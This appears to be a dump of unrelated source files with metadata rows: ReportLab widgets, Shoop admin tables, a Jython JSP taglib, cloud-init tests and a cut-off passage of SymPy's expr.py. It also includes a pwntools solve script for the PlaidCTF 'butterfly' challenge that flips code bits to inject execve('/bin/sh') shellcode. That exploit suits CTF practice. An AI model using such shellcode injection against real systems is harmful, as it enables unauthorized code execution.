class Face(Widget):
"""This draws a face with two eyes.
It exposes a couple of properties
to configure itself and hides all other details.
"""
_attrMap = AttrMap(
x = AttrMapValue(isNumber),
y = AttrMapValue(isNumber),
size = AttrMapValue(isNumber),
skinColor = AttrMapValue(isColorOrNone),
eyeColor = AttrMapValue(isColorOrNone),
mood = AttrMapValue(OneOf('happy','sad','ok')),
)
def __init__(self):
self.x = 10
self.y = 10
self.size = 80
self.skinColor = None
self.eyeColor = colors.blue
self.mood = 'happy'
def demo(self):
pass
def draw(self):
s = self.size # abbreviate as we will use this a lot
g = shapes.Group()
g.transform = [1,0,0,1,self.x, self.y]
# background
g.add(shapes.Circle(s * 0.5, s * 0.5, s * 0.5, fillColor=self.skinColor))
# left eye
g.add(shapes.Circle(s * 0.35, s * 0.65, s * 0.1, fillColor=colors.white))
g.add(shapes.Circle(s * 0.35, s * 0.65, s * 0.05, fillColor=self.eyeColor))
# right eye
g.add(shapes.Circle(s * 0.65, s * 0.65, s * 0.1, fillColor=colors.white))
g.add(shapes.Circle(s * 0.65, s * 0.65, s * 0.05, fillColor=self.eyeColor))
# nose
g.add(shapes.Polygon(
points=[s * 0.5, s * 0.6, s * 0.4, s * 0.3, s * 0.6, s * 0.3],
fillColor=None))
# mouth
if self.mood == 'happy':
offset = -0.05
elif self.mood == 'sad':
offset = +0.05
else:
offset = 0
g.add(shapes.Polygon(
points = [
s * 0.3, s * 0.2, #left of mouth
s * 0.7, s * 0.2, #right of mouth
s * 0.6, s * (0.2 + offset), # the bit going up or down
s * 0.4, s * (0.2 + offset) # the bit going up or down
],
fillColor = colors.pink,
strokeColor = colors.red,
strokeWidth = s * 0.03
))
return g
class TwoFaces(Widget):
def __init__(self):
self.faceOne = Face()
self.faceOne.mood = "happy"
self.faceTwo = Face()
self.faceTwo.x = 100
self.faceTwo.mood = "sad"
def draw(self):
"""Just return a group"""
return shapes.Group(self.faceOne, self.faceTwo)
def demo(self):
"""The default case already looks good enough,
no implementation needed here"""
pass
class Sizer(Widget):
"Container to show size of all enclosed objects"
_attrMap = AttrMap(BASE=shapes.SolidShape,
contents = AttrMapValue(isListOfShapes,desc="Contained drawable elements"),
)
def __init__(self, *elements):
self.contents = []
self.fillColor = colors.cyan
self.strokeColor = colors.magenta
for elem in elements:
self.add(elem)
def _addNamedNode(self,name,node):
'if name is not None add an attribute pointing to node and add to the attrMap'
if name:
if name not in self._attrMap.keys():
self._attrMap[name] = AttrMapValue(isValidChild)
setattr(self, name, node)
def add(self, node, name=None):
"""Appends non-None child node to the 'contents' attribute. In addition,
if a name is provided, it is subsequently accessible by name
"""
# propagates properties down
if node is not None:
assert isValidChild(node), "Can only add Shape or UserNode objects to a Group"
self.contents.append(node)
self._addNamedNode(name,node)
def getBounds(self):
# get bounds of each object
if self.contents:
b = []
for elem in self.contents:
b.append(elem.getBounds())
return shapes.getRectsBounds(b)
else:
return (0,0,0,0)
def draw(self):
g = shapes.Group()
(x1, y1, x2, y2) = self.getBounds()
r = shapes.Rect(
x = x1,
y = y1,
width = x2-x1,
height = y2-y1,
fillColor = self.fillColor,
strokeColor = self.strokeColor
)
g.add(r)
for elem in self.contents:
g.add(elem)
return g
def test():
from reportlab.graphics.charts.piecharts import WedgeProperties
wedges = TypedPropertyCollection(WedgeProperties)
wedges.fillColor = colors.red
wedges.setVector(fillColor=(colors.blue,colors.green,colors.white))
print len(_ItemWrapper)
d = shapes.Drawing(400, 200)
tc = TwoCircles()
d.add(tc)
import renderPDF
renderPDF.drawToFile(d, 'sample_widget.pdf', 'A Sample Widget')
print 'saved sample_widget.pdf'
d = shapes.Drawing(400, 200)
f = Face()
f.skinColor = colors.yellow
f.mood = "sad"
d.add(f, name='theFace')
print 'drawing 1 properties:'
d.dumpProperties()
renderPDF.drawToFile(d, 'face.pdf', 'A Sample Widget')
print 'saved face.pdf'
d2 = d.expandUserNodes()
renderPDF.drawToFile(d2, 'face_copy.pdf', 'An expanded drawing')
print 'saved face_copy.pdf'
print 'drawing 2 properties:'
d2.dumpProperties()
if __name__=='__main__':
test()
|
bsd-3-clause
| -6,657,977,910,297,390,000
| 33.846939
| 111
| 0.561856
| false
| 4.165283
| false
| false
| false
|
parksjin01/ctf
|
2016/Plaid/butterfly.py
|
1
|
1767
|
#!/usr/bin/env python2
from pwn import *
#r = remote('butterfly.pwning.xxx', 9999)
r = process('./butterfly')
loop_val = '0x20041c6'
# Start the loop
r.sendline(loop_val)
# Generate the payload
start_addr = 0x40084a
shell_addr = 0x400914
shellcode = '4831f648c7c03b0000004831d248c7c7140940000f05'
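# The shellcode bytes above appear to disassemble to (worth double-checking):
#   xor rsi, rsi       ; argv = NULL
#   mov rax, 0x3b      ; execve(2) syscall number
#   xor rdx, rdx       ; envp = NULL
#   mov rdi, 0x400914  ; pointer to "/bin/sh\0" (shell_addr)
#   syscall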
text = '4531f664488b042528000000483b44244075264489f0'
shell = ''.join('{:02x}'.format(ord(c)) for c in list('/bin/sh\0'))
greeting = 'THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?'[0:8]
greeting = ''.join('{:02x}'.format(ord(c)) for c in greeting)
# We need to process the hex payload byte by byte
chunks_sc = [shellcode[i:i+2] for i in range(0, len(shellcode), 2)]
chunks_tx = [text[i:i+2] for i in range(0, len(text), 2)]
# loop over each byte
for i in range(0,len(chunks_tx)):
# compute the flips needed
flips = list('{:08b}'.format(int(chunks_tx[i],16) ^ int(chunks_sc[i], 16)))
flips.reverse()
indices = []
# store the offsets of the flips in a table
for j in range(0,len(flips)):
if (flips[j] == '1'):
indices.append(j)
# for each flip send a corresponding number
for n in indices:
r.sendline('0x{:x}'.format((start_addr + i) * 8 + n))
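# Worked example of the offset arithmetic (inferred from the loop above):
# to flip bit n of the byte at address A, the binary expects the single
# number A * 8 + n, e.g. flipping bit 3 of 0x40084a means sending
# 0x40084a * 8 + 3 = 0x2004253.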
#Same for the greeting and shell
chunks_sh = [shell[i:i+2] for i in range(0, len(shell), 2)]
chunks_gr = [greeting[i:i+2] for i in range(0, len(greeting), 2)]
for i in range(0,len(chunks_gr)):
flips = list('{:08b}'.format(int(chunks_gr[i],16) ^ int(chunks_sh[i], 16)))
flips.reverse()
indices = []
for j in range(0,len(flips)):
if (flips[j] == '1'):
indices.append(j)
for n in indices:
r.sendline('0x{:x}'.format((shell_addr + i) * 8 + n))
# Reset the call to mprotect
r.sendline(loop_val)
r.clean()
r.interactive()
|
mit
| -8,768,587,543,166,460,000
| 30.553571
| 79
| 0.633843
| false
| 2.621662
| false
| false
| false
|
taedori81/shoop
|
shoop/admin/utils/picotable.py
|
1
|
13367
|
# -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2015, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
import json
import six
from django.core.paginator import EmptyPage, Paginator
from django.db.models import Count, Manager, Q, QuerySet
from django.http.response import JsonResponse
from django.template.defaultfilters import yesno
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from shoop.admin.utils.urls import get_model_url, NoModelUrl
from shoop.utils.dates import try_parse_date
from shoop.utils.objects import compact
from shoop.utils.serialization import ExtendedJSONEncoder
def maybe_callable(thing, context=None):
"""
If `thing` is callable, return it.
If `thing` names a callable attribute of `context`, return it.
"""
if callable(thing):
return thing
if isinstance(thing, six.string_types):
thing = getattr(context, thing, None)
if callable(thing):
return thing
return None
def maybe_call(thing, context, args=None, kwargs=None):
"""
If `thing` is callable, call it with args and kwargs and return the value.
If `thing` names a callable attribute of `context`, call it with args and kwargs and return the value.
Otherwise return `thing`.
"""
func = maybe_callable(context=context, thing=thing)
if func:
thing = func(*(args or ()), **(kwargs or {}))
return thing
class Filter(object):
type = None
def to_json(self, context):
return None
def filter_queryset(self, queryset, column, value):
return queryset # pragma: no cover
class ChoicesFilter(Filter):
type = "choices"
def __init__(self, choices=None, filter_field=None):
self.filter_field = filter_field
self.choices = choices
def _flatten_choices(self, context):
if not self.choices:
return None
choices = maybe_call(self.choices, context=context)
if isinstance(choices, QuerySet):
choices = [(c.pk, c) for c in choices]
return [(None, "")] + [
(force_text(value, strings_only=True), force_text(display))
for (value, display)
in choices
]
def to_json(self, context):
return {
"choices": self._flatten_choices(context)
}
def filter_queryset(self, queryset, column, value):
return queryset.filter(**{(self.filter_field or column.id): value})
class RangeFilter(Filter):
type = "range"
def __init__(self, min=None, max=None, step=None, field_type=None, filter_field=None):
"""
:param filter_field: Filter field (Django query expression). If None, column ID is used.
:type filter_field: str|None
:param min: Minimum value.
:param max: Maximum value.
:param step: Step value. See the HTML5 documentation for semantics.
:param field_type: Field type string. See the HTML5 documentation for semantics.
:type field_type: str|None
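
        For example (illustrative; field name is hypothetical),
        ``RangeFilter(filter_field="price")`` given
        ``value == {"min": 10, "max": 99}`` builds the lookup
        ``{"price__gte": 10, "price__lte": 99}`` in ``filter_queryset``.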
"""
self.filter_field = filter_field
self.min = min
self.max = max
self.step = step
self.field_type = field_type
def to_json(self, context):
return {
"range": compact({
"min": maybe_call(self.min, context=context),
"max": maybe_call(self.max, context=context),
"step": maybe_call(self.step, context=context),
"type": self.field_type,
})
}
def filter_queryset(self, queryset, column, value):
if value:
min = value.get("min")
max = value.get("max")
q = {}
filter_field = (self.filter_field or column.id)
if min is not None:
q["%s__gte" % filter_field] = min
if max is not None:
q["%s__lte" % filter_field] = max
if q:
queryset = queryset.filter(**q)
return queryset
class DateRangeFilter(RangeFilter):
def __init__(self, *args, **kwargs):
super(DateRangeFilter, self).__init__(*args, **kwargs)
if not self.field_type:
self.field_type = "date"
def filter_queryset(self, queryset, column, value):
if value:
value = {
"min": try_parse_date(value.get("min")),
"max": try_parse_date(value.get("max")),
}
return super(DateRangeFilter, self).filter_queryset(queryset, column, value)
class TextFilter(Filter):
type = "text"
def __init__(self, field_type=None, placeholder=None, operator="icontains", filter_field=None):
"""
:param filter_field: Filter field (Django query expression). If None, column ID is used.
:type filter_field: str|None
:param field_type: Field type string. See the HTML5 documentation for semantics.
:type field_type: str|None
:param placeholder: Field placeholder string.
:type placeholder: str|None
:param operator: Django operator for the queryset.
:type operator: str
"""
self.filter_field = filter_field
self.field_type = field_type
self.placeholder = placeholder
self.operator = operator
def to_json(self, context):
return {
"text": compact({
"type": self.field_type,
"placeholder": force_text(self.placeholder) if self.placeholder else None,
})
}
def filter_queryset(self, queryset, column, value):
if value:
value = force_text(value).strip()
if value:
return queryset.filter(**{"%s__%s" % ((self.filter_field or column.id), self.operator): value})
return queryset
class MultiFieldTextFilter(TextFilter):
def __init__(self, filter_fields, **kwargs):
"""
        :param filter_fields: List of filter fields (Django query expressions).
        :type filter_fields: list<str>
:param kwargs: Kwargs for `TextFilter`.
"""
super(MultiFieldTextFilter, self).__init__(**kwargs)
self.filter_fields = tuple(filter_fields)
def filter_queryset(self, queryset, column, value):
if value:
q = Q()
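            # OR the per-field lookups together; with hypothetical fields this
            # builds e.g. Q(name__icontains=value) | Q(sku__icontains=value)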
for filter_field in self.filter_fields:
q |= Q(**{"%s__%s" % (filter_field, self.operator): value})
return queryset.filter(q)
return queryset
true_or_false_filter = ChoicesFilter([
(False, _("no")),
(True, _("yes"))
])
class Column(object):
def __init__(self, id, title, **kwargs):
self.id = id
self.title = title
self.sort_field = kwargs.pop("sort_field", id)
self.display = kwargs.pop("display", id)
self.class_name = kwargs.pop("class_name", None)
self.filter_config = kwargs.pop("filter_config", None)
self.sortable = bool(kwargs.pop("sortable", True))
self.linked = bool(kwargs.pop("linked", True))
        if kwargs and type(self) is Column:  # only the base class validates, so unknown kwargs from client code don't pass silently
raise NameError("Unexpected kwarg(s): %s" % kwargs.keys())
def to_json(self, context=None):
out = {
"id": force_text(self.id),
"title": force_text(self.title),
"className": force_text(self.class_name) if self.class_name else None,
"filter": self.filter_config.to_json(context=context) if self.filter_config else None,
"sortable": bool(self.sortable),
"linked": bool(self.linked),
}
return dict((key, value) for (key, value) in six.iteritems(out) if value is not None)
def sort_queryset(self, queryset, desc=False):
order_by = ("-" if desc else "") + self.sort_field
queryset = queryset.order_by(order_by)
if self.sort_field.startswith("translations__"):
# Ref http://archlinux.me/dusty/2010/12/07/django-dont-use-distinct-and-order_by-across-relations/
queryset = queryset.annotate(_dummy_=Count(self.sort_field))
return queryset
def filter_queryset(self, queryset, value):
if self.filter_config:
queryset = self.filter_config.filter_queryset(queryset, self, value)
return queryset
def get_display_value(self, context, object):
display_callable = maybe_callable(self.display, context=context)
if display_callable:
return display_callable(object)
value = object
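        # e.g. a display of "product__name" (hypothetical) walks
        # object.product -> .name, tolerating missing attributes via getattr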
for bit in self.display.split("__"):
value = getattr(value, bit, None)
if isinstance(value, bool):
value = yesno(value)
if isinstance(value, Manager):
value = ", ".join("%s" % x for x in value.all())
return force_text(value)
class Picotable(object):
def __init__(self, request, columns, queryset, context):
self.request = request
self.columns = columns
self.queryset = queryset
self.context = context
self.columns_by_id = dict((c.id, c) for c in self.columns)
self.get_object_url = maybe_callable("get_object_url", context=self.context)
self.get_object_abstract = maybe_callable("get_object_abstract", context=self.context)
def process_queryset(self, query):
queryset = self.queryset
filters = (query.get("filters") or {})
for column, value in six.iteritems(filters):
column = self.columns_by_id.get(column)
if column:
queryset = column.filter_queryset(queryset, value)
sort = query.get("sort")
if sort:
desc = (sort[0] == "-")
column = self.columns_by_id.get(sort[1:])
if not (column and column.sortable):
raise ValueError("Can't sort by column %r" % sort[1:])
queryset = column.sort_queryset(queryset, desc=desc)
return queryset
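
    # Illustrative shape of the parsed "jq" query consumed by get_data
    # (field names are examples): {"perPage": 20, "page": 1, "sort": "-id",
    # "filters": {"name": "foo"}}; a leading "-" in "sort" requests
    # descending order and "filters" maps column IDs to filter values.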
def get_data(self, query):
paginator = Paginator(self.process_queryset(query), query["perPage"])
try:
page = paginator.page(int(query["page"]))
except EmptyPage:
page = paginator.page(paginator.num_pages)
out = {
"columns": [c.to_json(context=self.context) for c in self.columns],
"pagination": {
"perPage": paginator.per_page,
"nPages": paginator.num_pages,
"nItems": paginator.count,
"pageNum": page.number,
},
"items": [self.process_item(item) for item in page],
"itemInfo": _("Showing %(per_page)s of %(n_items)s %(verbose_name_plural)s") % {
"per_page": min(paginator.per_page, paginator.count),
"n_items": paginator.count,
"verbose_name_plural": self.get_verbose_name_plural(),
}
}
return out
def process_item(self, object):
out = {
"_id": object.id,
"_url": (self.get_object_url(object) if callable(self.get_object_url) else None),
}
for column in self.columns:
out[column.id] = column.get_display_value(context=self.context, object=object)
out["_abstract"] = (self.get_object_abstract(object, item=out) if callable(self.get_object_abstract) else None)
return out
def get_verbose_name_plural(self):
try:
return self.queryset.model._meta.verbose_name_plural
except AttributeError:
return _("objects")
class PicotableViewMixin(object):
columns = []
picotable_class = Picotable
template_name = "shoop/admin/base_picotable.jinja"
def process_picotable(self, query_json):
pico = self.picotable_class(
request=self.request,
columns=self.columns,
queryset=self.get_queryset(),
context=self
)
return JsonResponse(pico.get_data(json.loads(query_json)), encoder=ExtendedJSONEncoder)
def get(self, request, *args, **kwargs):
query = request.GET.get("jq")
if query:
return self.process_picotable(query)
return super(PicotableViewMixin, self).get(request, *args, **kwargs)
def get_object_url(self, instance):
try:
return get_model_url(instance)
except NoModelUrl:
pass
return None
def get_object_abstract(self, instance, item):
"""
Get the object abstract lines (used for mobile layouts) for this object.
Supported keys in abstract line dicts are:
* text (required)
* title
* class (CSS class name -- `header` for instance)
* raw (boolean; whether or not the `text` is raw HTML)
:param instance: The instance
:param item: The item dict so far. Useful for reusing precalculated values.
:return: Iterable of dicts to pass through to the picotable javascript
:rtype: Iterable[dict]
"""
return None
def get_filter(self):
filter_string = self.request.GET.get("filter")
return json.loads(filter_string) if filter_string else {}
|
agpl-3.0
| 7,626,388,386,203,150,000
| 33.992147
| 119
| 0.597292
| false
| 3.998504
| true
| false
| false
|
ActiveState/code
|
recipes/Python/252132_generic_jythtaglib/recipe-252132.py
|
1
|
3673
|
## store this into classes/jython/get.java
package jython;
import javax.servlet.jsp.*;
import javax.servlet.jsp.tagext.*;
import org.python.util.PythonInterpreter;
import org.python.core.*;
public class get extends TagSupport{
public PythonInterpreter interp;
public String cmd;
protected PageContext pageContext;
public get(){super();}
public void setVar(String cmd){this.cmd=cmd;}
public void setPageContext(PageContext pageContext) {
this.pageContext = pageContext;
}
public int doEndTag() throws javax.servlet.jsp.JspTagException{
try{
if(pageContext.getAttribute("jythonInterp")==null){
interp = new PythonInterpreter();
pageContext.setAttribute("jythonInterp",interp,PageContext.PAGE_SCOPE);
} else {
interp=(PythonInterpreter)pageContext.getAttribute("jythonInterp");
}
String res=interp.eval(cmd).toString();
pageContext.getOut().write(res);
}catch(java.io.IOException e){
throw new JspTagException("IO Error: " + e.getMessage());
}
return EVAL_PAGE;
}
}
## store this into classes/jython/exec.java
package jython;
import javax.servlet.jsp.*;
import javax.servlet.jsp.tagext.*;
import org.python.util.PythonInterpreter;
public class exec extends BodyTagSupport{
public PythonInterpreter interp;
public void setParent(Tag parent) {
this.parent = parent;
}
public void setBodyContent(BodyContent bodyOut) {
this.bodyOut = bodyOut;
}
public void setPageContext(PageContext pageContext) {
this.pageContext = pageContext;
}
public Tag getParent() {
return this.parent;
}
public int doStartTag() throws JspException {
return EVAL_BODY_TAG;
}
public int doEndTag() throws JspException {
return EVAL_PAGE;
}
// Default implementations for BodyTag methods as well
// just in case a tag decides to implement BodyTag.
public void doInitBody() throws JspException {
}
public int doAfterBody() throws JspException {
String cmd = bodyOut.getString();
if(pageContext.getAttribute("jythonInterp")==null){
interp = new PythonInterpreter();
interp.set("pageContext",pageContext);
pageContext.setAttribute("jythonInterp",interp,PageContext.PAGE_SCOPE);
} else {
interp=(PythonInterpreter)pageContext.getAttribute("jythonInterp");
}
interp.exec(cmd);
return SKIP_BODY;
}
public void release() {
bodyOut = null;
pageContext = null;
parent = null;
}
protected BodyContent bodyOut;
protected PageContext pageContext;
protected Tag parent;
}
## store this into jsp/jython.tld
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE taglib PUBLIC "-//Sun Microsystems, Inc.//DTD JSP Tag Library 1.1//EN" "http://java.sun.com/j2ee/dtds/web-jsptaglibrary_1_1.dtd">
<taglib>
<tlibversion>1.0</tlibversion>
<jspversion>1.1</jspversion>
<shortname>jython</shortname>
<info>
A simple Jython tag library
</info>
<tag>
<name>exec</name>
<tagclass>jython.exec</tagclass>
</tag>
<tag>
<name>get</name>
<tagclass>jython.get</tagclass>
<bodycontent>empty</bodycontent>
<attribute>
<name>var</name>
<required>true</required>
</attribute>
</tag>
</taglib>
## add this to the web.xml file
<taglib>
<taglib-uri>http://www.jython.org</taglib-uri>
<taglib-location>/WEB-INF/jsp/jython.tld</taglib-location>
</taglib>
|
mit
| -4,884,085,414,985,294,000
| 25.615942
| 139
| 0.643616
| false
| 3.673
| false
| false
| false
|
cbuben/cloud-init
|
tests/unittests/test_handler/test_handler_yum_add_repo.py
|
1
|
2372
|
from cloudinit import util
from cloudinit.config import cc_yum_add_repo
from .. import helpers
import logging
from StringIO import StringIO
import configobj
LOG = logging.getLogger(__name__)
class TestConfig(helpers.FilesystemMockingTestCase):
def setUp(self):
super(TestConfig, self).setUp()
self.tmp = self.makeDir(prefix="unittest_")
def test_bad_config(self):
cfg = {
'yum_repos': {
'epel-testing': {
'name': 'Extra Packages for Enterprise Linux 5 - Testing',
# Missing this should cause the repo not to be written
# 'baseurl': 'http://blah.org/pub/epel/testing/5/$basearch',
'enabled': False,
'gpgcheck': True,
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL',
'failovermethod': 'priority',
},
},
}
self.patchUtils(self.tmp)
cc_yum_add_repo.handle('yum_add_repo', cfg, None, LOG, [])
self.assertRaises(IOError, util.load_file,
"/etc/yum.repos.d/epel_testing.repo")
def test_write_config(self):
cfg = {
'yum_repos': {
'epel-testing': {
'name': 'Extra Packages for Enterprise Linux 5 - Testing',
'baseurl': 'http://blah.org/pub/epel/testing/5/$basearch',
'enabled': False,
'gpgcheck': True,
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL',
'failovermethod': 'priority',
},
},
}
self.patchUtils(self.tmp)
cc_yum_add_repo.handle('yum_add_repo', cfg, None, LOG, [])
contents = util.load_file("/etc/yum.repos.d/epel_testing.repo")
contents = configobj.ConfigObj(StringIO(contents))
expected = {
'epel_testing': {
'name': 'Extra Packages for Enterprise Linux 5 - Testing',
'failovermethod': 'priority',
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL',
'enabled': '0',
'baseurl': 'http://blah.org/pub/epel/testing/5/$basearch',
'gpgcheck': '1',
}
}
self.assertEquals(expected, dict(contents))
|
gpl-3.0
| -351,846,011,476,720,400
| 34.402985
| 80
| 0.510118
| false
| 3.907743
| true
| false
| false
|
Curious72/sympy
|
sympy/core/expr.py
|
1
|
113033
|
from __future__ import print_function, division
from .sympify import sympify, _sympify, SympifyError
from .basic import Basic, Atom
from .singleton import S
from .evalf import EvalfMixin, pure_complex
from .decorators import _sympifyit, call_highest_priority
from .cache import cacheit
from .compatibility import reduce, as_int, default_sort_key, range
from mpmath.libmp import mpf_log, prec_to_dps
from collections import defaultdict
class Expr(Basic, EvalfMixin):
"""
Base class for algebraic expressions.
Everything that requires arithmetic operations to be defined
should subclass this class, instead of Basic (which should be
used only for argument storage and expression manipulation, i.e.
pattern matching, substitutions, etc).
See Also
========
sympy.core.basic.Basic
"""
__slots__ = []
@property
def _diff_wrt(self):
"""Is it allowed to take derivative wrt to this instance.
This determines if it is allowed to take derivatives wrt this object.
Subclasses such as Symbol, Function and Derivative should return True
to enable derivatives wrt them. The implementation in Derivative
separates the Symbol and non-Symbol _diff_wrt=True variables and
        temporarily converts the non-Symbol vars into Symbols when performing
the differentiation.
Note, see the docstring of Derivative for how this should work
mathematically. In particular, note that expr.subs(yourclass, Symbol)
should be well-defined on a structural level, or this will lead to
inconsistent results.
Examples
========
>>> from sympy import Expr
>>> e = Expr()
>>> e._diff_wrt
False
>>> class MyClass(Expr):
... _diff_wrt = True
...
>>> (2*MyClass()).diff(MyClass())
2
"""
return False
@cacheit
def sort_key(self, order=None):
coeff, expr = self.as_coeff_Mul()
if expr.is_Pow:
expr, exp = expr.args
else:
expr, exp = expr, S.One
if expr.is_Dummy:
args = (expr.sort_key(),)
elif expr.is_Atom:
args = (str(expr),)
else:
if expr.is_Add:
args = expr.as_ordered_terms(order=order)
elif expr.is_Mul:
args = expr.as_ordered_factors(order=order)
else:
args = expr.args
args = tuple(
[ default_sort_key(arg, order=order) for arg in args ])
args = (len(args), tuple(args))
exp = exp.sort_key(order=order)
return expr.class_key(), args, exp, coeff
# ***************
# * Arithmetics *
# ***************
    # Expr and its subclasses use _op_priority to determine which object
# passed to a binary special method (__mul__, etc.) will handle the
# operation. In general, the 'call_highest_priority' decorator will choose
# the object with the highest _op_priority to handle the call.
# Custom subclasses that want to define their own binary special methods
# should set an _op_priority value that is higher than the default.
#
# **NOTE**:
# This is a temporary fix, and will eventually be replaced with
# something better and more powerful. See issue 5510.
_op_priority = 10.0
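
    # A minimal sketch (hypothetical class, not part of this module) of a
    # subclass claiming precedence in mixed operations such as
    # ``Expr() + MyWrapper()``:
    #
    #     class MyWrapper(Expr):
    #         _op_priority = 11.0  # higher than Expr's default of 10.0
    #
    #         @_sympifyit('other', NotImplemented)
    #         @call_highest_priority('__add__')
    #         def __radd__(self, other):
    #             ...  # this runs instead of Expr.__add__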
def __pos__(self):
return self
def __neg__(self):
return Mul(S.NegativeOne, self)
def __abs__(self):
from sympy import Abs
return Abs(self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__radd__')
def __add__(self, other):
return Add(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__add__')
def __radd__(self, other):
return Add(other, self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rsub__')
def __sub__(self, other):
return Add(self, -other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__sub__')
def __rsub__(self, other):
return Add(other, -self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rmul__')
def __mul__(self, other):
return Mul(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__mul__')
def __rmul__(self, other):
return Mul(other, self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rpow__')
def __pow__(self, other):
return Pow(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__pow__')
def __rpow__(self, other):
return Pow(other, self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rdiv__')
def __div__(self, other):
return Mul(self, Pow(other, S.NegativeOne))
@_sympifyit('other', NotImplemented)
@call_highest_priority('__div__')
def __rdiv__(self, other):
return Mul(other, Pow(self, S.NegativeOne))
__truediv__ = __div__
__rtruediv__ = __rdiv__
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rmod__')
def __mod__(self, other):
return Mod(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__mod__')
def __rmod__(self, other):
return Mod(other, self)
def __int__(self):
# Although we only need to round to the units position, we'll
# get one more digit so the extra testing below can be avoided
# unless the rounded value rounded to an integer, e.g. if an
# expression were equal to 1.9 and we rounded to the unit position
# we would get a 2 and would not know if this rounded up or not
# without doing a test (as done below). But if we keep an extra
# digit we know that 1.9 is not the same as 1 and there is no
# need for further testing: our int value is correct. If the value
# were 1.99, however, this would round to 2.0 and our int value is
# off by one. So...if our round value is the same as the int value
# (regardless of how much extra work we do to calculate extra decimal
# places) we need to test whether we are off by one.
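        # For example, a value close to but below 2 (say 1.999999) rounds
        # at 2 digits to 2.0; int(2.0) == 2 equals the rounded value, so
        # the off-by-one check below fires and corrects the result to 1.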
from sympy import Dummy
r = self.round(2)
if not r.is_Number:
raise TypeError("can't convert complex to int")
if r in (S.NaN, S.Infinity, S.NegativeInfinity):
raise TypeError("can't convert %s to int" % r)
i = int(r)
if not i:
return 0
# off-by-one check
if i == r and not (self - i).equals(0):
isign = 1 if i > 0 else -1
x = Dummy()
# in the following (self - i).evalf(2) will not always work while
# (self - r).evalf(2) and the use of subs does; if the test that
# was added when this comment was added passes, it might be safe
# to simply use sign to compute this rather than doing this by hand:
diff_sign = 1 if (self - x).evalf(2, subs={x: i}) > 0 else -1
if diff_sign != isign:
i -= isign
return i
__long__ = __int__
def __float__(self):
# Don't bother testing if it's a number; if it's not this is going
# to fail, and if it is we still need to check that it evalf'ed to
# a number.
result = self.evalf()
if result.is_Number:
return float(result)
if result.is_number and result.as_real_imag()[1]:
raise TypeError("can't convert complex to float")
raise TypeError("can't convert expression to float")
def __complex__(self):
result = self.evalf()
re, im = result.as_real_imag()
return complex(float(re), float(im))
def __ge__(self, other):
from sympy import GreaterThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s >= %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_nonnegative is not None and \
dif.is_nonnegative is not dif.is_negative:
return sympify(dif.is_nonnegative)
return GreaterThan(self, other, evaluate=False)
def __le__(self, other):
from sympy import LessThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s <= %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_nonpositive is not None and \
dif.is_nonpositive is not dif.is_positive:
return sympify(dif.is_nonpositive)
return LessThan(self, other, evaluate=False)
def __gt__(self, other):
from sympy import StrictGreaterThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s > %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_positive is not None and \
dif.is_positive is not dif.is_nonpositive:
return sympify(dif.is_positive)
return StrictGreaterThan(self, other, evaluate=False)
def __lt__(self, other):
from sympy import StrictLessThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s < %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_negative is not None and \
dif.is_negative is not dif.is_nonnegative:
return sympify(dif.is_negative)
return StrictLessThan(self, other, evaluate=False)
@staticmethod
def _from_mpmath(x, prec):
from sympy import Float
if hasattr(x, "_mpf_"):
return Float._new(x._mpf_, prec)
elif hasattr(x, "_mpc_"):
re, im = x._mpc_
re = Float._new(re, prec)
im = Float._new(im, prec)*S.ImaginaryUnit
return re + im
else:
raise TypeError("expected mpmath number (mpf or mpc)")
@property
def is_number(self):
"""Returns True if 'self' has no free symbols.
        It will be faster than `if not self.free_symbols`, however, since
        `is_number` will return False as soon as it hits a free symbol.
Examples
========
>>> from sympy import log, Integral
>>> from sympy.abc import x
>>> x.is_number
False
>>> (2*x).is_number
False
>>> (2 + log(2)).is_number
True
>>> (2 + Integral(2, x)).is_number
False
>>> (2 + Integral(2, (x, 1, 2))).is_number
True
"""
return all(obj.is_number for obj in self.args)
def _random(self, n=None, re_min=-1, im_min=-1, re_max=1, im_max=1):
"""Return self evaluated, if possible, replacing free symbols with
random complex values, if necessary.
